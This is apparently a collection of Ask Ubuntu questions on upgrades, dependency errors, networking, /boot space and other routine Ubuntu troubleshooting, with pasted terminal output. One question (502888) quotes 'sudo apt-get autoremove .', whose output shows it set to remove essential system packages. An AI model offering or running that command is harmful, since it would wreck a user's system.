502879	do i need to upgrade my kernel ?	my first post here , so be kind , lol , i know you will be . i run a dual boot between windows 7 home premium 64-bit and ubuntu 12.04 lts , and the linux is a whole new learning curve for me . i bought an adata nh03 3tb external hard drive for backup because it had : an on/off switch ( rare ) and compatibility for linux kernel 2.6.31 or later before i plug it in i thought i 'd better double check my kernel and also whether on 32-bit or 64-bit linux . my search under the latter found for me : askubuntu.com/questions/41332/how-do-i-check-if-i-have-a-32-bit-or-a-64-bit-os i have actually soldiered through all 15 answers over nearly two years , but to fast-track , i can show you now results from the first couple of tries : 1st answer : a. chris @ ubuntu : ~ $ uname -a linux ubuntu 3.8.0-44-generic # 66~precise1-ubuntu smp tue jul 15 04:01:04 utc 2014 x86_64 x86_64 x86_64 gnu/linux b. chris @ ubuntu : ~ $ file /sbin/init /sbin/init : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x7aa29ded613e503fb09fb75d94026f3256f01e7a , stripped my question is this : if i have v2.6.24 and the adata is compatible with v2.6.31 on , then maybe i need to upgrade , and i note that v3.1.5.3 or more is around now . but could someone explain to me what the 3.8.0-44-generic , above , means ? thank you
502880	two software updaters	after i installed gnome shell on ubuntu 14.04 i got two software updaters , one from unity and one from gnome shell . after that i noticed my system is lot slower while it checks for new updates , so i assume that both software updaters work at the same time . my question is , how do i remove software updater from gnome shell , and keep the one from unity ?
502884	automatically get a file onto another computer ?	alright , brace yourself because this is a hard one to explain : so , i 'm on ubuntu 14.04 and my friend is on windows 7 , i need to be able to get a single file onto his computer without him having to stop what he 's doing . [ said friend is not close enough for a local network ] does anyone know how to make this happen ? is there some sort of shared drive we can have so the file would be available to him [ he just needs to have it on his computer/have his computer be able to access it ] ? or perhaps can i write a windows command that makes him access a direct download link every so often ? note this is with his consent , i 'm not trying to give him a virus or anything
502885	filezilla issue . plese help	i 'm able to upload files by filezilla , but when i try to download files from the same sites i receive : error : failed to open `` /file '' for writing error : file transfer failed however , i 'm able to use other ftp clients to upload and download to the same ftp sites . i can also successfully download the files on filezilla by using the `` view/edit '' option instead of the download option . i 'm using ubuntu 14.04 . any ideas how to fix this problem ?
502886	ubuntu 12.04.4 lts to 14.04.1 lts upgrade : `` no new release found ''	according to trusty tahr release schedule , ubuntu lts 14.04.1 ( first .1 version ) was released two days ago . unfortunately when trying to upgrade using the do-release-upgrade command i get the message no new release found . command line output : root @ foobar : ~ # cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.4 lts '' root @ foobar : ~ # do-release-upgrade checking for a new ubuntu release no new release found the threads upgrading lts to lts and no new release found make totally sense , but as i understand the first dot 1 version of ubuntu 14.04 ( 14.04.1 ) has yet been released , so why ca n't i still upgrade lts to lts ? is there a way to upgrade properly , not using the -d option with the do-release-upgrade command ?
502888	what happens if we add a dot at the end of sudo `apt-get autoremove`	sudo apt-get autoremove . output : warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! apt libapt-pkg4.12 ( due to apt ) libc6 ( due to apt ) libgcc1 ( due to apt ) libstdc++6 ( due to apt ) ubuntu-keyring ( due to apt ) gnupg ( due to apt ) base-files base-passwd libdebconfclient0 ( due to base-passwd ) bash debianutils ( due to bash ) dash ( due to bash ) libtinfo5 ( due to bash ) bsdutils coreutils libacl1 ( due to coreutils ) libattr1 ( due to coreutils ) libselinux1 ( due to coreutils ) dpkg ( due to dash ) sensible-utils ( due to debianutils ) diffutils libbz2-1.0 ( due to dpkg ) liblzma5 ( due to dpkg ) zlib1g ( due to dpkg ) tar ( due to dpkg ) e2fsprogs e2fslibs ( due to e2fsprogs ) libblkid1 ( due to e2fsprogs ) libcomerr2 ( due to e2fsprogs ) libss2 ( due to e2fsprogs ) libuuid1 ( due to e2fsprogs ) util-linux ( due to e2fsprogs ) findutils grep install-info ( due to grep ) libpcre3 ( due to grep ) gzip hostname libc-bin libcap2 ( due to libc-bin ) login libpam0g ( due to login ) libpam-runtime ( due to login ) libpam-modules ( due to login ) mount libmount1 ( due to mount ) ncurses-base ncurses-bin perl-base sed lsb-base ( due to util-linux ) tzdata ( due to util-linux ) debconf ( due to util-linux ) sysv-rc ( due to util-linux ) libncurses5 ( due to util-linux ) libslang2 ( due to util-linux ) 0 upgraded , 0 newly installed , 2913 to remove and 0 not upgraded . after this operation , 8,775 mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ] what does that dot do ?
502889	apanta studio for ubuntu 12.04	i am trying to run apanta studio 3 in ubuntu precise pangolin 12.04 i am getting the following error ! session 2014-07-26 14:27:32.493 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=unknown java.version=1.6.0_27 java.vendor=sun microsystems inc. bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_us command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.osgi 4 0 2014-07-26 14:27:32.890 ! message application error ! stack 1 java.lang.illegalstateexception : unable to acquire application service . ensure that the org.eclipse.core.runtime bundle is resolved and started ( see config.ini ) . at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:74 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:616 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 ) at org.eclipse.equinox.launcher.main.main ( main.java:1386 )
502890	nvidia 304 driver support in 14.04.1	i 'm currently on 12.04.4 and getting the upgrade prompt for 14.04 lts . just wondering if the nvidia 304 drivers are supported . thanks .
502903	resolve unmet dependencies	vikiboy @ batcave : ~ $ sudo apt-get install ros-indigo-openni-launch reading package lists ... done building dependency tree reading state information ... done ros-indigo-openni-launch is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libopenni-sensor-primesense-dev : depends : libopenni-sensor-primesense0 ( = 5.1.0.41-3+trusty1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . on running sudo apt-get -f install vikiboy @ batcave : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : at dctrl-tools devscripts distro-info-data dput libaudclient2 libaudcore1 libdistro-info-perl libexporter-lite-perl libio-stringy-perl libmowgli2 libparse-debcontrol-perl python3-magic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libopenni-sensor-primesense0 the following new packages will be installed : libopenni-sensor-primesense0 0 upgraded , 1 newly installed , 0 to remove and 4 not upgraded . 3 not fully installed or removed . need to get 0 b/300 kb of archives . after this operation , 1,354 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 343931 files and directories currently installed . ) preparing to unpack ... /libopenni-sensor-primesense0_5.1.0.41-3+trusty1_amd64.deb ... unpacking libopenni-sensor-primesense0 ( 5.1.0.41-3+trusty1 ) ... dpkg : error processing archive /var/cache/apt/archives/libopenni-sensor-primesense0_5.1.0.41-3+trusty1_amd64.deb ( -- unpack ) : trying to overwrite '/etc/openni/globaldefaults.ini ' , which is also in package libopenni-sensor-pointclouds0 5.1.0.41.1-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libopenni-sensor-primesense0_5.1.0.41-3+trusty1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please help
502905	how to upgrade ubuntu 13.10 ( end of life ) to ubuntu 14.04 ?	i 've eol release of ubuntu 13.10 . now i want to upgrade to next release . for this i read many sites . so herein i would like to clarify & confirm ways for the same . 1 ) this site of ubuntu mentions how to upgrade from 8.10 to 9.04 . it says to make sure the sources.list ( /etc/apt/sources.list ) has the following : # # eol upgrade sources.list # required deb http : //old-releases.ubuntu.com/ubuntu/ intrepid main restricted universe multiverse deb http : //old-releases.ubuntu.com/ubuntu/ intrepid-updates main restricted universe multiverse deb http : //old-releases.ubuntu.com/ubuntu/ intrepid-security main restricted universe multiverse # optional # deb http : //old-releases.ubuntu.com/ubuntu/ intrepid-backports main restricted universe multiverse # deb http : //old-releases.ubuntu.com/ubuntu/ intrepid-proposed main restricted universe multiverse now my sources.list in 13.10 has the following . it does n't have the words `` universe multiverse '' as is mentioned above . # deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) ] / saucy main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //in.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //in.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb-src http : //in.archive.ubuntu.com/ubuntu/ saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ saucy universe deb-src http : //in.archive.ubuntu.com/ubuntu/ saucy universe deb http : //in.archive.ubuntu.com/ubuntu/ saucy-updates universe deb-src http : //in.archive.ubuntu.com/ubuntu/ saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //in.archive.ubuntu.com/ubuntu/ saucy multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ saucy multiverse deb http : //in.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu saucy-security main restricted deb-src http : //security.ubuntu.com/ubuntu saucy-security main restricted deb http : //security.ubuntu.com/ubuntu saucy-security universe deb-src http : //security.ubuntu.com/ubuntu saucy-security universe deb http : //security.ubuntu.com/ubuntu saucy-security multiverse deb-src http : //security.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu saucy partner # deb-src http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main so , do i need to include those words in my sources.list or simply i replace the current codename `` saucy '' to `` trusty '' other than replacing `` archive.ubuntu.com '' to `` old-releases.ubuntu.com '' . please clarify the codename of 14.04 to be used in the sources.list , is it `` trusty '' ( i feel so ) or `` trusty tahr '' . if the code name to be used is `` trusty '' , then i do n't know why this ubuntu site mentions it 's codename as `` trusty tahr '' ! ! ! ! also as the 1st link explains , is it o.k . that i delete all lines from my sources.list ( in 13.10 ) & only include the stated 8 sentences ( obviously by replacing with the relevant codename ) as mentioned in the 1st code of this q ? 2 ) now that 1st link says to run the below commands . sudo aptitude update & & sudo aptitude safe-upgrade sudo do-release-upgrade that 's all ! but this link of ubuntu also states of installing some meta-packages/dependencies . please clarify what 's these dependencies & is it reqd . to install these ? if reqd . then why that link ( 1st link of upgrading from 8.10 to 9.04 ) does n't mention this ? 3 ) also , one more point i would like to clarify . see rather than doing via cli , i 'm getting a way to do via gui . see if i only replace archive.ubuntu.com to old-releases.ubuntu.com then when i run `` software updater '' , it has option to upgrade as shown below . so , can my system be upgraded this way even ? i 'm asking this because i could n't find this method mentioned for upgrading eol . 4 ) this is my last point to ask . ( sorry for extending this thread ) once i run the command to upgrade sudo do-release-upgrade via cli or if i click the `` upgrade '' button on the gui of the updater , is it possible that it does n't require my intervention or input anymore ( assuming no error occurs ) to complete the upgrade so that i can run the upgrade process in the night before going to sleep & when i get up it should be done ?
502906	14.04 - old firefox version wo n't install , ca n't use profile manager	i 'm new to ubuntu . ( 14.04 ) firefox comes default as version 31.x , but i need to use 29.0.1 . i 've tried following multiple instructions , whereby copying an old firefox ( old v29 ) to the usr/bin directory after unzippping it , thus overwriting the default version ( v31 ) . i ca n't seem to get everything working though . the default version ( v31 ) and old version ( v29 ) run side by side , but opening the profile manager via the command line ( firefox -p ) just opens it via the new version ( v31 ) . i need to completely remove the new version ( v31 ) of firefox and just have the old version ( v29 ) , which i can then access the profile manager from the command line ( so it 's all v29 ) . removing the new firefox installed by default ( v31 ) via sudo apt-get remove firefox will stop 'firefox ' being accessable in the terminal , despite the old version ( v29 ) existing in usr/bin i 'm very confused and need some guidance .
502907	having problem with installing apt-fast	i 'm trying to install apt-fast , and i use bellow commands : sudo add-apt-repository ppa : apt-fast/stable sudo apt-get update after updating my sources i receive following warnings : . . . ign http : //ubuntu.unitedcolo.de trusty/main translation-en_us ign http : //ubuntu.unitedcolo.de trusty/multiverse translation-en_us ign http : //ubuntu.unitedcolo.de trusty/restricted translation-en_us ign http : //ubuntu.unitedcolo.de trusty/universe translation-en_us ign http : //ubuntu.unitedcolo.de trusty-updates/main translation-en_us ign http : //ubuntu.unitedcolo.de trusty-updates/multiverse translation-en_us ign http : //ubuntu.unitedcolo.de trusty-updates/restricted translation-en_us ign http : //ubuntu.unitedcolo.de trusty-updates/universe translation-en_us fetched 21.2 mb in 13min 19s ( 26.5 kb/s ) w : failed to fetch http : //ppa.launchpad.net/apt-fast/stable/ubuntu/dists/trusty/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/apt-fast/stable/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/apt-fast/stable/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . and when i enter : sudo apt-get install apt-fast it says that there is no apt-fast packages : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package apt-fast why this happen ? thanks
502910	how to open file in gui mode with terminal ?	i could not find the section as you can open the file in a graphics mode , that is such a file 1.txt terminal displays the contents but i would love to see it with the gedit or another text editor ?
502915	upside-down question mark	i 'm using ubuntu 12.04 [ 1 ] with a dvorak keyboard layout . i need to write a bunch of emails in spanish on a daily basis and i really really need a keyboard shortcut to the inverted question mark glyph ( 多 ) , but i just ca n't find any . so far i 've been either copying and pasting it from the character map ( which is , seriously , a pain in the ass ) or just not bothering with it ( which i tend to avoid because it makes me look sloppy ) . is there a way of defining a key combination ( e.g. , ctrl + shift + ? ) that inputs this character ? [ 1 ] yes , yes , i know it 's 2014 and all that . i 'm happy with 12.04 and i do n't see the need to upgrade just because , so please do n't tell me to .
502919	ubuntu 14.04.1 howto set a short non complex password for very kiddies ?	i tried different things : edit /etc/pam.d/common-password and /usr/share/pam-configs/unix , none worked , account remains disabled , i ca n't set the password , the `` change '' button remains grayed : )
502927	web page loading issue	i am using ubuntu 14.04 . from the beginning i am trying to access some web pages in chrome/firefox but it is not loading . some of them are : www.w3schools.com , www.omappedia.org , tutorialsforlinux.com etc . & i am very sure some other also will be there which will not load so can anybody tell me what is the problem & how it can be rectified .
502931	how to install version 4.11 of the package texinfo ?	i need to install the package texinfo version 4.11 that i downloaded from http : //ftp.gnu.org/gnu/texinfo/ and unpacked ( folder texinfo-4.11 ) . i already installed packages with the 'sudo apt-get install ' command in the terminal . however , this does not work with 'sudo apt-get install texinfo-4.11 ' in the correct terminal location . the following error messages appear : e : unable to locate package texinfo-4.11 e : could n't find any package by regex 'texinfo-4.11'
502932	networking does n't work after update	i recently installed updates to my ubuntu 12.04 installation notified to me via the updates manager . on completion , when i did a restart , no networking , wireless or cable , was working . networking still works if i reboot to the previous version , but that is a pain . which package do i need to re-install to get the latest version to network again ? i am adding the log for the package installation as it is too long for a comment . can anyone spot the possible cause of the problem : start-date : 2014-07-16 22:22:13 commandline : aptdaemon role='role-commit-packages ' sender=':1.91' install : linux-image-3.5.0-54-generic : amd64 ( 3.5.0-54.81~precise1 ) , linux-headers-3.5.0-54-generic : amd64 ( 3.5.0-54.81~precise1 ) , linux-headers-3.5.0-54 : amd64 ( 3.5.0-54.81~precise1 ) upgrade : libswscale2 : amd64 ( 0.8.12-0ubuntu0.12.04.1 , 0.8.13-0ubuntu0.12.04.1 ) , libavformat-extra-53 : amd64 ( 0.8.12ubuntu0.12.04.1 , 0.8.13ubuntu0.12.04.1 ) , variety : amd64 ( 0.4.18 , 0.4.19 ) , libjpeg-turbo8 : amd64 ( 1.1.90+svn733-0ubuntu4.3 , 1.1.90+svn733-0ubuntu4.4 ) , libjpeg-turbo8 : i386 ( 1.1.90+svn733-0ubuntu4.3 , 1.1.90+svn733-0ubuntu4.4 ) , libavutil-extra-51 : amd64 ( 0.8.12ubuntu0.12.04.1 , 0.8.13ubuntu0.12.04.1 ) , transmission-gtk : amd64 ( 2.51-0ubuntu1.3 , 2.51-0ubuntu1.4 ) , linux-image-generic-lts-quantal : amd64 ( 3.5.0.52.57 , 3.5.0.54.59 ) , transmission-common : amd64 ( 2.51-0ubuntu1.3 , 2.51-0ubuntu1.4 ) , linux-headers-generic-lts-quantal : amd64 ( 3.5.0.52.57 , 3.5.0.54.59 ) , libminiupnpc8 : amd64 ( 1.6-3ubuntu1 , 1.6-3ubuntu1.1 ) , wget : amd64 ( 1.13.4-2ubuntu1 , 1.13.4-2ubuntu1.1 ) , libpostproc52 : amd64 ( 0.8.12-0ubuntu0.12.04.1 , 0.8.13-0ubuntu0.12.04.1 ) , google-chrome-stable : amd64 ( 35.0.1916.153-1 , 36.0.1985.125-1 ) , file : amd64 ( 5.09-2ubuntu0.3 , 5.09-2ubuntu0.4 ) , linux-generic-lts-quantal : amd64 ( 3.5.0.52.57 , 3.5.0.54.59 ) , linux-libc-dev : amd64 ( 3.2.0-65.99 , 3.2.0-67.101 ) , libavcodec-extra-53 : amd64 ( 0.8.12ubuntu0.12.04.1 , 0.8.13ubuntu0.12.04.1 ) , libmagic1 : amd64 ( 5.09-2ubuntu0.3 , 5.09-2ubuntu0.4 ) end-date : 2014-07-16 22:38:31
502933	how to prepare a flow chart using libre office writer	short and simply put how to prepare a common flow chart using libre office . i just want to prepare a simple flow chart without any complexities .
502937	boost_thread not found , illumina bcl2fastq 1.8.3 installation error , casava , illumina casava also showing same error	i am trying to install illumina bcl2fastq 1.8.3 , on ubuntu 14.04 , cmake is 2.8.4 and boost is 1.44 . both cmake and boost are bundled with bcl2fastq only . i get the following error , can anyone please explain me this error , i could n't understand it . please also explain how to set boost_librarydir to the directory containing boost libraries or boost_root to the location of boost . cmake error at /tmp/bcl2fastq_v1.8.3-build/bootstrap/share/cmake-2.8/modules/findboost.cmake:1128 ( message ) : unable to find the requested boost libraries . boost version : 1.44.0 boost include path : /tmp/bcl2fastq_v1.8.3-build/opt/bootstrap/include the following boost libraries could not be found : boost_thread some ( but not all ) of the required boost libraries were found . you may need to install these additional boost libraries . alternatively , set boost_librarydir to the directory containing boost libraries or boost_root to the location of boost . call stack ( most recent call first ) : cmake/macros.cmake:93 ( find_package ) cmake/cxxconfigure.cmake:87 ( casava_find_boost ) c++/cmakelists.txt:33 ( include ) -- found libxml2 : /usr/lib/x86_64-linux-gnu/libxml2.so -- using compiler : gcc version 4.9.1 -- adding the c++ library subdirectory : common -- adding the c++ library subdirectory : io -- adding the c++ library subdirectory : alignment -- adding the c++ library subdirectory : basecalling -- adding the c++ library subdirectory : kagu -- adding the c++ library subdirectory : demultiplex -- adding the c++ program subdirectory : bin -- adding the c++ program subdirectory : basecalls -- adding the c++ program subdirectory : demultiplex -- found doxygen : /usr/bin/doxygen -- doxygen : /usr/bin/doxygen . dot : /usr/bin/dot . -- creating doxygen config file : /tmp/bcl2fastq_v1.8.3-build/c++/doxyfile -- configuring incomplete , errors occurred ! could n't configure the project : /tmp/bcl2fastq_v1.8.3-build/bootstrap/bin/cmake -h '' /tmp/bcltofastq/src '' -b '' /tmp/bcl2fastq_v1.8.3-build '' -g '' unix makefiles '' -dcasava_prefix : path= -dcasava_exec_prefix : path= -dcmake_install_prefix : path= -dcasava_bindir : path= -dcasava_libdir : path= -dcasava_libexecdir : path= -dcasava_includedir : path= -dcasava_datadir : path= -dcasava_docdir : path= -dcasava_mandir : path= -dcmake_build_type : string=relwithdebinfo moving cmakecache.txt to cmakecache.txt.removed
502942	lubuntu enforces screen lock	i ca n't disable screen lock in lubuntu . in power management i have it unchecked . there is another option `` enable light locker '' in the `` light locker settings '' . i also have this unchecked but i still see black screen after 10 minutes and when i move the mouse i have to provide a password . i hate this behaviour in all ubuntus , but usually i can just disable it in system settings . well not here . so lubuntu has these settings in two places and is ignoring both . i found this question : stop xscreensaver from locking screen once screensaver starts according to this , i tried to remove `` xscreensaver '' package , but did n't have it installed at all . so this solves edit : what i learned so far : this is not magic . it affects other people as well it is caused by a bug in xfce power manager : https : //bugs.launchpad.net/ubuntu/+source/xfce4-power-manager/+bug/1193716
502943	connect konica minolta dialta 1611 printer	i am trying to connect an old konica minolta dialta 1611 printer to a freshly installed xubuntu 14.04 installation . drivers do n't show up in the driver search in the os , and the company does n't seem to have linux drivers available . is this possible ? is there a way to use the windows drivers ?
502952	disable nautilus password saving	it 's possible to disable the nautilus 's password saving capability when i connect to windows share ? i want to achieve that every time the user opens a password protected windows share , he/she should enter his/her username and password . now there are three options when i open a windows share in nautilus . the password could be remembered forever , it could be remembered until the user logs out , or it could be forgotten by nautilus when it 's closed . and the user could chose one of these options . i want to disable these options so every time when somebody wants to access a shared folder , a valid username and password is required .
502953	ubuntu server 14.04 ca n't update internet problem	i recently installed a fresh copy of ubuntu server 14.04 . the install was fine . but after the install the problems begin . to be sure i have al the recent updates i typed sudo apt-get update . the result i get is no update only errors . it somehow ca n't fetch any of the stated links . so i tought maybe the links are wrong but that ai n't the problem . i changed the links and it still does n't work . so i tought maybe there is a problem with my internet connection ( i use wifi ) . so i googled around and found this post : ubuntu 14.04 server - wifi wpa2 personal . after i tried that the following results : iwconfig : lo no wireless extensions wlan0 iee 802.11ng essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragnebt thr : off power management : on ifconfig : lo all the normal values in /etc/network/interfaces i have the following : auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static address 192.168.000.15 # ( 000 ) is something else netmask 255.255.255.0 gateway 192.168.000.1 ipconfig from a windows pc gives ( so not from the router itself ) wpa-ssid the network name wpa-psk the network password dns-nameservers 8.8.8.8 8.8.4.4 also ping does n't give me anything to work with . if i ping the ip adress i entered in interfaces it will receive the packages . if i ping google i get host unknow during installation i installed the following packages : ubuntu basic server ; openssh ; apache server ; mail server ; samba file server added : when i dosudo ifdown wlan0 & & sudo ifup -v wlan0 all things seems to be normal except for 2 things : on the 1st line : ifdown : interface wlan0 not configured and on the last line : failed to bring up wlan0 update after a few reboots iwconfig now returns : lo no wireless extensions wlan0 iee 802.11ng essid : '' my network name '' mode : managed frequency:2.427 ghz access point : blabla bit rate=54mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragnebt thr : off power management : on and so on so i hope everything is now working if i need to add more information please let me know . i hope someone can fix my problem with internet connection . thanks in advance .
502954	looking for advice reg oracle 12c installation on ubuntu	i am pondering different options to install oracle 12c on my ubuntu quickly . my network speed and bandwidth are not great , i would prefer to download as less as possible as my intention is just to check compatibility of my application . i was able to install oracle 11gr2 on my system which took lot of effort and i do not want to disturb this installation . following are the options i am considering . please guide me which one is possible and better choice . ( as of now i have not downloaded any software expect oracle vm virtual machine for ubuntu which is of size 90mb ) 1 ) i have vmware installed , download image for oracle for linux and oracle 12c database for oracle for linux . create virtual os for oracle for linux and run oracle 12c 2 ) download oracle vm virtual machine for ubuntu , download image for oracle for linux and oracle 12c database for oracle for linux . create virtual os for oracle for linux and run oracle 12c . installation of oracle vm virtual machine for ubuntu is giving some problems which need to be sorted out 3 ) download redhat linux image and run it from vmware . since oracle 12c is certified for redhat , install on redhat in virtual machine 4 ) install oracle 12c on ubuntu itself through guides available over web . my system config as follows : ubuntu release 12.04 precise 64-bit kernel linux 3.8.0-42-generic gnome 3.4.2 memory : 7.7 g processor : i5-3230m cpu @ 2.6 ghz x 4 available disk space : 55.gb [ i have searched for relevant questions in forum , but i did not find answer . if you think this question is duplicate , kindly redirect me ] thanks , prasad
502959	dpkg : error processing file in archives	when i want to upgrade the backtrack linux to ubuntu 14.04 the following errror occurs : ( reading database ... 218798 files and directories currently installed . ) preparing to replace hostname 3.03ubuntu1 ( using ... /hostname_3.15ubuntu1_amd64.deb ) ... unpacking replacement hostname ... dpkg-deb : file `/var/cache/apt/archives/hostname_3.15ubuntu1_amd64.deb ' contains ununderstood data member data.tar.xz , giving up dpkg : error processing /var/cache/apt/archives/hostname_3.15ubuntu1_amd64.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/hostname_3.15ubuntu1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i fix it ? note : i copied the ubuntu repos to bactrack
502960	create back up image of the folder	help me please what software ( ubuntu 14.04 ) to use for creating images ( files , folder ) i have some folder and files ( not os ) which i need to move to another hdd . it should in one image file which i mount and copy some folders of files to new location . iso is not acceptable because overall size of the files is around 400gigs ? thank 's for the answers .
502966	installing ubuntu 12.04 in win 7 core 2 duo machine using vmware	i have a intel ( r ) core ( tm ) 2 duo cpu with 2gb ram,32-bit windows 7 loaded . i need to run ubuntu in vmware , but even the desktop of ubuntu is not loading properly . what are the possible solutions ? how much more ram is required ?
502970	both windows 8.1 and ubuntu not booting after installing ubuntu 14.04	i had installed windows 8.1 in my dell inspiron 5521 in legacy mode . i then tried installing ubuntu 14.04 . the installation was successful . but after rebooting , i was unable to boot into any os . while booting windows , `` a disk read error ... .. '' appears . ca n't boot into ubuntu too . this is my boot-repair paste . http : //paste.ubuntu.com/7864978/ hope i 'll get the issue resolved here 's my gparted screenshot
502971	/dev/sda1 /boot is full	i know there are a lot of questions like this but i 've tried pretty much to understand what to do and failed . by df -h i know that my /dev/sda1 /boot is with 100 % use . i 'm not understanding what i should remove , at all . i 'm running nginx and wanted to install nodejs but i was alerted of unmet dependencies when trying sudo apt-get install nodejs and sudo apt-get -f install failed for lack of space . can i get some specific guidance on this one please ? i 'm feeling totally lost . dpkg -- list | grep linux-image : ii linux-image-3.8.0-29-generic 3.8.0-29.42~precise1 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-3.8.0-34-generic 3.8.0-34.49~precise1 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-3.8.0-35-generic 3.8.0-35.52~precise1 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-3.8.0-36-generic 3.8.0-36.52~precise1 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-3.8.0-37-generic 3.8.0-37.53~precise1 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-3.8.0-38-generic 3.8.0-38.56~precise1 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-3.8.0-39-generic 3.8.0-39.58~precise1 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-3.8.0-42-generic 3.8.0-42.62~precise1 linux kernel image for version 3.8.0 on 32 bit x86 smp iu linux-image-generic-lts-raring 3.8.0.44.44 generic linux kernel image uname -r : 3.8.0-42-generic sudo apt-get purge linux-image-x.x.x.x-generic you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . linux-image-generic-lts-raring : depends : linux-image-3.8.0-44-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . sudo apt-get -f install dpkg : error processing /var/cache/apt/archives/linux-image-3.8.0-44-generic_3.8.0-44.66~precise1_i386.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during ./boot/vmlinuz-3.8.0-44-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.8.0-44-generic /boot/vmlinuz-3.8.0-44-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.8.0-44-generic /boot/vmlinuz-3.8.0-44-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.8.0-44-generic_3.8.0-44.66~precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
502972	upstart job can not create directory in /var/run	i the following config in /etc/init/foo.conf on ubuntu 12.04.4 : description `` foo '' start on filesystem or runlevel [ 2345 ] stop on runlevel [ ! 2345 ] pre-start script mkdir -p -m 0775 /var/run/foo chown foo : foo /var/run/foo end script setuid foo setgid foo exec /usr/local/bin/foo however when this is run at boot , and when i attempt to run it manually with sudo start foo i get the following error in /var/log/upstart/foo.log : mkdir : can not create directory `/var/run/foo ' : permission denied why is this occurring and how can i fix it ?
